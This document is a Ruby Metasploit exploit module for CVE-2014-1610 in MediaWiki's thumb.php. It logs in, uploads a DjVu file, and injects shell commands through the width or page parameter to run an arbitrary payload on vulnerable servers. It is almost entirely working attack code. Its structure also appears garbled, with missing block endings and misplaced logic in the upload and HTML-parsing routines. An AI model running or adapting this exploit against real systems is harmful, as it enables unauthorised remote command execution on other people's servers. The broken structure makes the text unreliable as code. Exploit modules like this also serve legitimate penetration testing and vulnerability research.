MediaWiki Thumb.php Remote Command Execution

##

# This module requires Metasploit: http//metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})

super(update_info(info,

'Name' => 'MediaWiki Thumb.php Remote Command Execution',

'Description' => %q{

MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11,

when DjVu or PDF file upload support is enabled, allows remote unauthenticated

users to execute arbitrary commands via shell metacharacters. If no target file

is specified this module will attempt to log in with the provided credentials to

upload a file (.DjVu) to use for exploitation.

},

'Author' =>

[

'Netanel Rubin', # from Check Point - Discovery

'Brandon Perry', # Metasploit Module

'Ben Harris', # Metasploit Module

'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module

],

'License' => MSF_LICENSE,

'References' =>

[

[ 'CVE', '2014-1610' ],

[ 'OSVDB', '102630'],

[ 'URL', 'http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html' ],

[ 'URL', 'https://bugzilla.wikimedia.org/show_bug.cgi?id=60339' ]

],

'Privileged' => false,

'Targets' =>

[

[ 'Automatic PHP-CLI',

{

'Payload' =>

{

'BadChars' => "\r\n",

'PrependEncoder' => "php -r \"",

'AppendEncoder' => "\""

},

'Platform' => ['php'],

'Arch' => ARCH_PHP

}

],

[ 'Linux CMD',

{

'Payload' =>

{

'BadChars' => "",

'Compat' =>

{

'PayloadType' => 'cmd',

'RequiredCmd' => 'generic perl python php',

}

},

'Platform' => ['unix'],

'Arch' => ARCH_CMD

}

],

[ 'Windows CMD',

{

'Payload' =>

{

'BadChars' => "",

'Compat' =>

{

'PayloadType' => 'cmd',

'RequiredCmd' => 'generic perl',

}

},

'Platform' => ['win'],

'Arch' => ARCH_CMD

}

]

],

'DefaultTarget' => 0,

'DisclosureDate' => 'Jan 28 2014'))

register_options(

[

OptString.new('TARGETURI', [ true, "Base MediaWiki path", '/mediawiki' ]),

OptString.new('FILENAME', [ false, "Target DjVu/PDF file (e.g target.djvu target.pdf)", nil ]),

OptString.new('USERNAME', [ false, "Username to authenticate with", '' ]),

OptString.new('PASSWORD', [ false, "Password to authenticate with", '' ])

], self.class)

end

def get_version(body)

meta_generator = get_html_value(body, 'meta', 'generator', 'content')

unless meta_generator

vprint_status("No META Generator tag on #{full_uri}.")

return nil, nil, nil

end

if meta_generator && meta_generator =~ /mediawiki/i

vprint_status("#{meta_generator} detected.")

meta_generator =~ /(\d)\.(\d+)[\.A-z]+(\d+)/

major = $1.to_i

minor = $2.to_i

patch = $3.to_i

vprint_status("Major:#{major} Minor:#{minor} Patch:#{patch}")

return major, minor, patch

end

return nil, nil, nil

end

def check

uri = target_uri.path

opts = { 'uri' => normalize_uri(uri, 'index.php') }

response = send_request_cgi!(opts)

if opts['redirect_uri']

vprint_status("Redirected to #{opts['redirect_uri']}.")

end

unless response

vprint_status("No response from #{full_uri}.")

return CheckCode::Unknown

end

# Mediawiki will give a 404 for unknown pages but still have a body

if response.code == 200 || response.code == 404

vprint_status("#{response.code} response received...")

major, minor, patch = get_version(response.body)

unless major

return CheckCode::Unknown

end

if major == 1 && (minor < 8 || minor > 22)

return CheckCode::Safe

elsif major == 1 && (minor == 22 && patch > 1)

return CheckCode::Safe

elsif major == 1 && (minor == 21 && patch > 4)

return CheckCode::Safe

elsif major == 1 && (minor == 19 && patch > 10)

return CheckCode::Safe

elsif major == 1

return CheckCode::Appears

else

return CheckCode::Safe

end

vprint_status("Received response code #{response.code} from #{full_uri}")

CheckCode::Unknown

end

def exploit

uri = target_uri.path

print_status("Grabbing version and login CSRF token...")

response = send_request_cgi({

'uri' => normalize_uri(uri, 'index.php'),

'vars_get' => { 'title' => 'Special:UserLogin' }

})

unless response

fail_with(Failure::NotFound, "Failed to retrieve webpage.")

end

server = response['Server']

if server && target.name =~ /automatic/i && server =~ /win32/i

vprint_status("Windows platform detected: #{server}.")

my_platform = Msf::Module::Platform::Windows

elsif server && target.name =~ /automatic/i

vprint_status("Nix platform detected: #{server}.")

my_platform = Msf::Module::Platform::Unix

else

my_platform = target.platform.platforms.first

end

# If we have already identified a DjVu/PDF file on the server trigger

# the exploit

unless datastore['FILENAME'].blank?

payload_request(uri, datastore['FILENAME'], my_platform)

return

end

username = datastore['USERNAME']

password = datastore['PASSWORD']

major, minor, patch = get_version(response.body)

# Upload CSRF added in v1.18.2

# http://www.mediawiki.org/wiki/Release_notes/1.18#Changes_since_1.18.1

if ((major == 1) && (minor == 18) && (patch == 0 || patch == 1))

upload_csrf = false

elsif ((major == 1) && (minor < 18))

upload_csrf = false

else

upload_csrf = true

end

session_cookie = response.get_cookies

wp_login_token = get_html_value(response.body, 'input', 'wpLoginToken', 'value')

if wp_login_token.blank?

fail_with(Failure::UnexpectedReply, "Couldn't find login token. Is URI set correctly?")

else

print_good("Retrieved login CSRF token.")

end

print_status("Attempting to login...")

login = send_request_cgi({

'uri' => normalize_uri(uri, 'index.php'),

'method' => 'POST',

'vars_get' => {

'title' => 'Special:UserLogin',

'action' => 'submitlogin',

'type' => 'login'

},

'cookie' => session_cookie,

'vars_post' => {

'wpName' => username,

'wpPassword' => password,

'wpLoginAttempt' => 'Log in',

'wpLoginToken' => wp_login_token

}

})

if login and login.code == 302

print_good("Log in successful.")

else

fail_with(Failure::NoAccess, "Failed to log in.")

end

auth_cookie = login.get_cookies.gsub('mediawikiToken=deleted;','')

# Testing v1.15.1 it looks like it has session fixation

# vulnerability so we dont get a new session cookie after

# authenticating. Therefore we need to include our old cookie.

unless auth_cookie.include? 'session='

auth_cookie << session_cookie

end

print_status("Getting upload CSRF token...") if upload_csrf

upload_file = send_request_cgi({

'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),

'cookie' => auth_cookie

})

unless upload_file and upload_file.code == 200

fail_with(Failure::NotFound, "Failed to access file upload page.")

end

wp_edit_token = get_html_value(upload_file.body, 'input', 'wpEditToken', 'value') if upload_csrf

wp_upload = get_html_value(upload_file.body, 'input', 'wpUpload', 'value')

title = get_html_value(upload_file.body, 'input', 'title', 'value')

if upload_csrf && wp_edit_token.blank?

fail_with(Failure::UnexpectedReply, "Couldn't find upload token. Is URI set correctly?")

elsif upload_csrf

print_good("Retrieved upload CSRF token.")

end

upload_mime = Rex::MIME::Message.new

djvu_file = ::File.read(::File.join(Msf::Config.data_directory, "exploits", "cve-2014-1610", "metasploit.djvu"))

file_name = "#{rand_text_alpha(4)}.djvu"

upload_mime.add_part(djvu_file, "application/octet-stream", "binary", "form-data; name=\"wpUploadFile\"; filename=\"#{file_name}\"")

upload_mime.add_part("#{file_name}", nil, nil, "form-data; name=\"wpDestFile\"")

upload_mime.add_part("#{rand_text_alpha(4)}", nil, nil, "form-data; name=\"wpUploadDescription\"")

upload_mime.add_part("", nil, nil, "form-data; name=\"wpLicense\"")

upload_mime.add_part("1",nil,nil, "form-data; name=\"wpIgnoreWarning\"")

upload_mime.add_part(wp_edit_token, nil, nil, "form-data; name=\"wpEditToken\"") if upload_csrf

upload_mime.add_part(title, nil, nil, "form-data; name=\"title\"")

upload_mime.add_part("1", nil, nil, "form-data; name=\"wpDestFileWarningAck\"")

upload_mime.add_part(wp_upload, nil, nil, "form-data; name=\"wpUpload\"")

post_data = upload_mime.to_s

print_status("Uploading DjVu file #{file_name}...")

upload = send_request_cgi({

'method' => 'POST',

'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),

'data' => post_data,

'ctype' => "multipart/form-data; boundary=#{upload_mime.bound}",

'cookie' => auth_cookie

})

if upload and upload.code == 302 and upload.headers['Location']

location = upload.headers['Location']

print_good("File uploaded to #{location}")

else

if upload.body.include? 'not a permitted file type'

fail_with(Failure::NotVulnerable, "Wiki is not configured for target files.")

else

fail_with(Failure::UnexpectedReply, "Failed to upload file.")

end

payload_request(uri, file_name, my_platform)

end

def payload_request(uri, file_name, my_platform)

if my_platform == Msf::Module::Platform::Windows

trigger = "1)&(#{payload.encoded})&"

else

trigger = "1;#{payload.encoded};"

end

vars_get = { 'f' => file_name }

if file_name.include? '.pdf'

vars_get['width'] = trigger

elsif file_name.include? '.djvu'

vars_get['width'] = 1

vars_get['p'] = trigger

else

fail_with(Failure::BadConfig, "Unsupported file extension: #{file_name}")

end

print_status("Sending payload request...")

r = send_request_cgi({

'uri' => normalize_uri(uri, 'thumb.php'),

'vars_get' => vars_get

}, 1)

if r && r.code == 404 && r.body =~ /not exist/

print_error("File: #{file_name} does not exist.")

elsif r

print_error("Received response #{r.code}, exploit probably failed.")

end

# The order of name, value keeps shifting so regex is painful.

# Cant use nokogiri due to security issues

# Cant use REXML directly as its not strict XHTML

# So we do a filthy mixture of regex and REXML

def get_html_value(html, type, name, value)

return nil unless html

return nil unless type

return nil unless name

return nil unless value

found = nil

html.each_line do |line|

if line =~ /(<#{type}[^\/]*name="#{name}".*?\/>)/i

found = $&

break

end

if found

doc = REXML::Document.new found

return doc.root.attributes[value]

end

''

end